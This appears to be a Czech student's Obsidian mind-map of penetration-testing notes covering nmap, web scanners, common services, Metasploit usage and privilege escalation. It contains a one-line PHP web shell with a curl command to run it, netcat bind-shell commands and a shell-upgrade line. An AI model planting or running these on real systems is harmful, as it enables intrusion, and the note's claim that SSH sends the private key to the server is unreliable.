{
	"nodes":[
		{"type":"text","text":"Co tam běží za služby?","id":"4aec6cd070b9e9ec","x":-682,"y":160,"width":245,"height":60},
		{"type":"text","text":"## Nástroje","id":"adbe2e8225ff3455","x":-1144,"y":390,"width":164,"height":60,"color":"2"},
		{"type":"text","text":"**-Pn** -> server neodpovídá na ping (bude trvat déle)","id":"1a5498e08d57dca3","x":-2360,"y":-420,"width":250,"height":80},
		{"type":"text","text":"**-sn** -> pouze ping scan, ne porty","id":"17cb9dd45bf03b8a","x":-2360,"y":-307,"width":250,"height":60},
		{"type":"text","text":"**-p** *port,port-port* -> skenovat jen určité porty","id":"ac271d1d92b4b8ec","x":-2360,"y":-217,"width":250,"height":74},
		{"type":"text","text":"**-sV** -> skenovat i verze služeb","id":"bee77cd46eb67516","x":-2360,"y":-110,"width":250,"height":60},
		{"type":"text","text":"**-A** -> **-sV** + **-O** + **-sC**","id":"726936ea739c80c3","x":-2700,"y":-23,"width":250,"height":60},
		{"type":"text","text":"**-O** -> detekce OS","id":"587f21f5f7771e3f","x":-2360,"y":-23,"width":250,"height":60},
		{"type":"text","text":"**-sC** -> default script scan","id":"1abeab07f1007378","x":-2360,"y":60,"width":250,"height":60},
		{"type":"text","text":"**-v** -> výpis do terminalu","id":"ed766eaa092fb857","x":-2360,"y":150,"width":250,"height":60},
		{"type":"text","text":"**-T0-5** -> rychlost/intervaly mezi scany, vyšší je rychlejší, *default je T3* (řeší se to kvůli detekci, aby to nebylo moc agresivní)","id":"c6b555c153c8baf2","x":-2360,"y":230,"width":250,"height":170},
		{"type":"text","text":"## Služby","id":"f2478ca29db53e87","x":-630,"y":490,"width":136,"height":50,"color":"2"},
		{"type":"text","text":"#### Telnet\n- typicky 23\n- není šifrovaný","id":"cdd6957a5350fd96","x":-806,"y":950,"width":250,"height":130,"color":"1"},
		{"type":"text","text":"- `telnet <ip>`\n- login přes username a password\n- není šifrovaný, takže je packety lze odchytit a přečíst\n- pokud na stroji je telnet -> potenciál","id":"1db8b78d07999842","x":-802,"y":1220,"width":243,"height":220},
		{"type":"text","text":"- `ssh <flagy> <username>@<ip>`\n- login většinou přes username a password\n- ověřování probíhá přes ssh klíče\n- já pošlu privátní klíč na server a on ho veřejným ověří\n- ssh klíče se dají ukrást a pomocí `ssh -i <klíč> <ip>` můžeme využít k auth","id":"4cfa7bccadb67469","x":-1129,"y":1220,"width":289,"height":380},
		{"type":"text","text":"#### SSH\n- typicky 22\n- OpenSSH\n- je šifrovaný","id":"d76f1518189727eb","x":-1089,"y":950,"width":209,"height":150,"color":"1"},
		{"type":"text","text":"#### RDP\n- remote desktop protocol (windows)\n- typicky 3389\n- na windows `mst`","id":"b8dcc106ac2e34ad","x":-520,"y":950,"width":250,"height":180,"color":"1"},
		{"type":"text","text":"### Nmap\n`nmap <ip> <flagy>` ->\nSkener portů","id":"b6c2c978ffcb82c7","x":-1908,"y":355,"width":280,"height":130,"color":"4"},
		{"type":"text","text":"### Legion\n\n`legion` -> udělá auto port scan, scan zranitelností a zjistí informace o cíly\nmá GUI","id":"70e5f6506701111e","x":-1520,"y":450,"width":280,"height":220,"color":"4"},
		{"id":"db756fcf7747ba17","x":60,"y":330,"width":220,"height":60,"color":"2","type":"text","text":"## Jak je využít"},
		{"type":"text","text":"### Nikto\n`nikto -host <ip>` ->\nskener web zranitelností","id":"b6a35ea7abf87e1c","x":-2060,"y":578,"width":270,"height":130,"color":"4"},
		{"type":"text","text":"### Webové služby\n- typicky 80/443\n- Apache httpd / nginx","id":"eb3b674f5f010470","x":-1768,"y":1060,"width":220,"height":160,"color":"4"},
		{"type":"text","text":"#### Http\n- Není šifrované\n- Komunikace probíhá především přes GET a POST\n- GET: request a předávání je v url řádku\n- POST: request a předávání je v datech requestu","id":"a890f1e2f09c4120","x":-1960,"y":1520,"width":250,"height":335,"color":"1"},
		{"type":"text","text":"#### Https\n- Je šifrované\n- Zbytek je stejný, jen tu komunikaci nezvládneš přečíst","id":"0f1cba395f1acb3c","x":-1595,"y":1520,"width":250,"height":195,"color":"1"},
		{"id":"478d7c07dc8d2bc6","x":-2602,"y":771,"width":304,"height":169,"color":"1","type":"text","text":"#### Získání informací\n`whatweb <ip>` -> základní info\n`dirb <url>` -> directory bruteforce\n`curl <url>` -> request na server\n"},
		{"id":"6503efcf24bcd274","x":-220,"y":950,"width":280,"height":238,"color":"1","type":"text","text":"#### SMB\n- aka Samba\n- nejen Windows protokol pro sdílení souborů a informací po síti\n- ve Windows \"Network/Síť\""},
		{"id":"960fba7374b4e540","x":100,"y":949,"width":257,"height":239,"color":"1","type":"text","text":"#### SNMP\n- Simple Network Management Protocol\n- zařízení mezi sebou komunikují tímto protocolem v rámci centrální správy\n"},
		{"id":"e53bdf6018b6c7a1","x":860,"y":1069,"width":400,"height":171,"type":"text","text":"`netcat <ip> <port>` -> banner grab\n`nc -lvnp <port>` -> lokální bind shell na nějakém portu (attacker)\n`nc <ip> <port>` -> připojit se k bind shell ^^ (target)"},
		{"id":"1ef97d157813933c","x":420,"y":800,"width":403,"height":259,"color":"1","type":"text","text":"#### Web shell\n- uploadnout soubor na web server\n`echo \"<?php system(\\$_GET['cmd']);?>\" > /var/www/html/shell.php`\n- request na daný soubor s příkazem jako parametr\n`curl http://<ip>:<port>/shell.php?cmd=<command>`"},
		{"id":"65b6b36ec355e012","x":559,"y":540,"width":125,"height":60,"color":"4","type":"text","text":"### Shell"},
		{"id":"de086fe89b96a6b8","x":-251,"y":1285,"width":342,"height":155,"type":"text","text":"`smbclient -N -L \\\\\\\\<ip>` -> listne shary\n`smbclient -N -L \\\\\\\\<ip>\\\\<path>` -> připojení k share"},
		{"id":"e7032a21a806dd2c","x":935,"y":800,"width":250,"height":125,"color":"1","type":"text","text":"#### Netcat\n- reverse/bind shell\n- banner grabbing"},
		{"id":"3e712d90ac0a42a1","x":1280,"y":800,"width":261,"height":150,"color":"1","type":"text","text":"#### Upgradování shell\n`python -c 'import pty; pty.spawn(\"/bin/bash\")'`"},
		{"id":"aa42ea7600d2caad","x":1039,"y":225,"width":146,"height":60,"color":"4","type":"text","text":"### Exploity"},
		{"id":"cad77a14835c4e27","x":1340,"y":-95,"width":401,"height":280,"type":"text","text":"#### CVE\nCommon Vulnerabilities and Exposures\n*CVE-YYYY-NNNN*\nCVE = zranitelnost -> najít konkrétní CVE exploit \n[Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers (exploit-db.com)](https://www.exploit-db.com/)\n[Vulners Database | Vulners.com](https://vulners.com/search)"},
		{"id":"671c0e992e3e6142","x":1378,"y":305,"width":428,"height":360,"type":"text","text":"#### Metasploit Framework\n`msfconsole`\npoužití:\n1) `search exploit <nazev>`\n2) najít ten správný a `use <id>`\n3) pomocí `info` zjistit detaily a options, případně jen `options`\n4) nastavit požadované options pomocí `set <OPTION> <VALUE>`\n5) `run`/`exploit`"},
		{"id":"b1586fc64cc8c726","x":480,"y":-95,"width":380,"height":191,"color":"4","type":"text","text":"### Privilege Escalation\n- eskalace práv\n- využít chyby nebo exploity abychom sobě zvýšili práva nebo získali účet s vyššími právy"},
		{"type":"text","text":"# Hacking","id":"01d3c55a83d9934f","x":-662,"y":-63,"width":200,"height":80,"color":"1"},
		{"id":"7ad0c28155d6f18d","x":400,"y":-600,"width":250,"height":400,"color":"1","type":"text","text":"#### Scripty\nLinpeas/Linenum -> velmi agresivní scripty, co projedou celý systém a hledají cokoliv sus, potenciální zranitelnosti a chyby v konfiguraci\nPostup:\n1) stáhnout script\n2) přesunout na target server\n3) přidat mu práva a spustit"},
		{"id":"1f35ebf4e6400083","x":720,"y":-600,"width":270,"height":360,"color":"1","type":"text","text":"#### Sudo\n`sudo -l` -> listne naše aktuální sudo práva\n`sudo -u <user> <command>` -> spustí příkaz jako sudo uživatele\nPokud máme právo na `sudo su`\n`sudo su -` -> přihlášení za root\n`sudo su <user> -` -> přihlášení za usera"},
		{"id":"736e8933d9f6c586","x":-1223,"y":-247,"width":240,"height":80,"color":"2","type":"text","text":"## Linux příkazy"},
		{"id":"c3ef5a9476cec0d4","x":-912,"y":-467,"width":264,"height":60,"color":"4","type":"text","text":"### Souborový systém"},
		{"id":"99824901f0d1fe12","x":-1228,"y":-467,"width":250,"height":60,"color":"4","type":"text","text":"### Práce s textem"},
		{"id":"0a9b605e7b4229a6","x":-1548,"y":-467,"width":250,"height":60,"color":"4","type":"text","text":"### Stahování"},
		{"id":"355c3419f1c32312","x":-912,"y":-827,"width":264,"height":294,"type":"text","text":"`mv <cesta> <nová cesta>` -> přesun souboru, dá se použít i pro přejmenování\n`rm <soubor>` -> odstranění souboru\n`rmdir <složka>` -> odstranění složky\n`touch <soubor>` -> vytvoření souboru\n"},
		{"id":"ed5f3e98b183fd2d","x":-1548,"y":-827,"width":250,"height":294,"type":"text","text":"`apt install <balíček>` -> nainstaluje balíček\n`apt update` -> najde aktualizace\n`apt upgrade` -> nainstaluje aktualizace\n`wget <url>` -> stáhne soubor"},
		{"id":"8118df0534fd4477","x":-1242,"y":-827,"width":278,"height":294,"type":"text","text":"`nano <soubor>` -> textový editor\n`cat <soubor>` -> vypsat obsah souboru\n`echo <text>` -> vypsat text\n*Přesměrování výstupu*\n`>` -> přepsat text souboru\n`>>` -> zapsat text do souboru\nPříklad: `nmap flairleap.com -A > vysledek.txt`"},
		{"type":"text","text":"### Vzdálený přístup","id":"a0707c546462a374","x":-806,"y":740,"width":243,"height":60,"color":"4"}
	],
	"edges":[
		{"id":"bdac5e45952bd2c4","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"1a5498e08d57dca3","toSide":"right"},
		{"id":"d597dad9d8f20bfe","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"17cb9dd45bf03b8a","toSide":"right"},
		{"id":"d1cd37181ea39b62","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"ac271d1d92b4b8ec","toSide":"right"},
		{"id":"f727487f5fd91a79","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"bee77cd46eb67516","toSide":"right"},
		{"id":"65ceca2b0bd07d7f","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"587f21f5f7771e3f","toSide":"right"},
		{"id":"cb45e4a8b31b804f","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"ed766eaa092fb857","toSide":"right"},
		{"id":"0c13a9478d8f4fbd","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"1abeab07f1007378","toSide":"right"},
		{"id":"c5f1b15719d2947d","fromNode":"bee77cd46eb67516","fromSide":"left","toNode":"726936ea739c80c3","toSide":"right"},
		{"id":"91ddd9cf7d6225f6","fromNode":"587f21f5f7771e3f","fromSide":"left","toNode":"726936ea739c80c3","toSide":"right"},
		{"id":"fe795c1594c9694c","fromNode":"1abeab07f1007378","fromSide":"left","toNode":"726936ea739c80c3","toSide":"right"},
		{"id":"f3b073641da07068","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"c6b555c153c8baf2","toSide":"right"},
		{"id":"39805ad2a72de09e","fromNode":"adbe2e8225ff3455","fromSide":"left","toNode":"b6c2c978ffcb82c7","toSide":"right"},
		{"id":"f1250290d56af56b","fromNode":"adbe2e8225ff3455","fromSide":"bottom","toNode":"70e5f6506701111e","toSide":"right"},
		{"id":"eb3237e6586b1f64","fromNode":"4aec6cd070b9e9ec","fromSide":"bottom","toNode":"adbe2e8225ff3455","toSide":"top"},
		{"id":"92a023f01853d333","fromNode":"70e5f6506701111e","fromSide":"left","toNode":"b6c2c978ffcb82c7","toSide":"bottom"},
		{"id":"789d715476604909","fromNode":"4aec6cd070b9e9ec","fromSide":"bottom","toNode":"f2478ca29db53e87","toSide":"top"},
		{"id":"754c79cdd03fce0e","fromNode":"f2478ca29db53e87","fromSide":"bottom","toNode":"eb3b674f5f010470","toSide":"top"},
		{"id":"57d0023432f715be","fromNode":"f2478ca29db53e87","fromSide":"bottom","toNode":"a0707c546462a374","toSide":"top"},
		{"id":"77bd24d73f83d4a2","fromNode":"a0707c546462a374","fromSide":"bottom","toNode":"d76f1518189727eb","toSide":"top"},
		{"id":"7cbbd8df75be7cbb","fromNode":"a0707c546462a374","fromSide":"bottom","toNode":"cdd6957a5350fd96","toSide":"top"},
		{"id":"ff55e434252c35fd","fromNode":"a0707c546462a374","fromSide":"bottom","toNode":"b8dcc106ac2e34ad","toSide":"top"},
		{"id":"334836d3845b56a7","fromNode":"cdd6957a5350fd96","fromSide":"bottom","toNode":"1db8b78d07999842","toSide":"top"},
		{"id":"53f64024b560ad5b","fromNode":"d76f1518189727eb","fromSide":"bottom","toNode":"4cfa7bccadb67469","toSide":"top"},
		{"id":"561dbdfa549cb53e","fromNode":"eb3b674f5f010470","fromSide":"bottom","toNode":"0f1cba395f1acb3c","toSide":"top"},
		{"id":"2d93cde04c4005a3","fromNode":"eb3b674f5f010470","fromSide":"bottom","toNode":"a890f1e2f09c4120","toSide":"top"},
		{"id":"791290ee37052876","fromNode":"0f1cba395f1acb3c","fromSide":"left","toNode":"a890f1e2f09c4120","toSide":"right"},
		{"id":"8a2ddaa480474d08","fromNode":"70e5f6506701111e","fromSide":"left","toNode":"b6a35ea7abf87e1c","toSide":"right"},
		{"id":"24ca1913ddf93f2e","fromNode":"eb3b674f5f010470","fromSide":"top","toNode":"b6a35ea7abf87e1c","toSide":"right"},
		{"id":"7db8aee2a2557842","fromNode":"4aec6cd070b9e9ec","fromSide":"right","toNode":"db756fcf7747ba17","toSide":"top"},
		{"id":"180d80945ecc489f","fromNode":"db756fcf7747ba17","fromSide":"bottom","toNode":"65b6b36ec355e012","toSide":"top"},
		{"id":"dd26e429a7f6eec6","fromNode":"e7032a21a806dd2c","fromSide":"bottom","toNode":"e53bdf6018b6c7a1","toSide":"top"},
		{"id":"bcce5befb5e00e8b","fromNode":"eb3b674f5f010470","fromSide":"left","toNode":"478d7c07dc8d2bc6","toSide":"right"},
		{"id":"3d3b05ad7af8856c","fromNode":"f2478ca29db53e87","fromSide":"bottom","toNode":"6503efcf24bcd274","toSide":"top"},
		{"id":"4c7f498ae3a1e886","fromNode":"6503efcf24bcd274","fromSide":"bottom","toNode":"de086fe89b96a6b8","toSide":"top"},
		{"id":"06b4ddf751528f13","fromNode":"f2478ca29db53e87","fromSide":"bottom","toNode":"960fba7374b4e540","toSide":"top"},
		{"id":"4ef929b3b094ebd8","fromNode":"65b6b36ec355e012","fromSide":"bottom","toNode":"e7032a21a806dd2c","toSide":"top"},
		{"id":"65748e9eb2260b86","fromNode":"65b6b36ec355e012","fromSide":"bottom","toNode":"1ef97d157813933c","toSide":"top"},
		{"id":"919aeea5d001bacb","fromNode":"65b6b36ec355e012","fromSide":"bottom","toNode":"3e712d90ac0a42a1","toSide":"top"},
		{"id":"6eff0df0084ee46e","fromNode":"db756fcf7747ba17","fromSide":"right","toNode":"aa42ea7600d2caad","toSide":"left"},
		{"id":"ed834c5343ae9031","fromNode":"aa42ea7600d2caad","fromSide":"right","toNode":"cad77a14835c4e27","toSide":"left"},
		{"id":"6e0ab327f8ed079e","fromNode":"f2478ca29db53e87","fromSide":"right","toNode":"db756fcf7747ba17","toSide":"left"},
		{"id":"22cb95e9b9872d09","fromNode":"aa42ea7600d2caad","fromSide":"bottom","toNode":"65b6b36ec355e012","toSide":"top"},
		{"id":"3b3b8088855efd18","fromNode":"cad77a14835c4e27","fromSide":"bottom","toNode":"671c0e992e3e6142","toSide":"top"},
		{"id":"216cfa9280325a49","fromNode":"aa42ea7600d2caad","fromSide":"right","toNode":"671c0e992e3e6142","toSide":"left"},
		{"id":"f6ba21d452e7980f","fromNode":"db756fcf7747ba17","fromSide":"right","toNode":"b1586fc64cc8c726","toSide":"bottom"},
		{"id":"0ebd2bf17ad03f34","fromNode":"b1586fc64cc8c726","fromSide":"top","toNode":"7ad0c28155d6f18d","toSide":"bottom"},
		{"id":"95ec6043caff918a","fromNode":"b1586fc64cc8c726","fromSide":"top","toNode":"1f35ebf4e6400083","toSide":"bottom"},
		{"id":"c7dca62d93981f48","fromNode":"01d3c55a83d9934f","fromSide":"bottom","toNode":"4aec6cd070b9e9ec","toSide":"top"},
		{"id":"3f7d35a27e2b428a","fromNode":"01d3c55a83d9934f","fromSide":"left","toNode":"736e8933d9f6c586","toSide":"bottom"},
		{"id":"ed711018a33480bf","fromNode":"736e8933d9f6c586","fromSide":"top","toNode":"c3ef5a9476cec0d4","toSide":"bottom"},
		{"id":"cf3dfae45ad156b5","fromNode":"736e8933d9f6c586","fromSide":"top","toNode":"99824901f0d1fe12","toSide":"bottom"},
		{"id":"0a0322193a6e3727","fromNode":"736e8933d9f6c586","fromSide":"top","toNode":"0a9b605e7b4229a6","toSide":"bottom"},
		{"id":"8249b85662d30ae5","fromNode":"c3ef5a9476cec0d4","fromSide":"top","toNode":"355c3419f1c32312","toSide":"bottom"},
		{"id":"f8f8b9075a2df83f","fromNode":"99824901f0d1fe12","fromSide":"top","toNode":"8118df0534fd4477","toSide":"bottom"},
		{"id":"0907b65bc74edcd1","fromNode":"0a9b605e7b4229a6","fromSide":"top","toNode":"ed5f3e98b183fd2d","toSide":"bottom"}
	]
}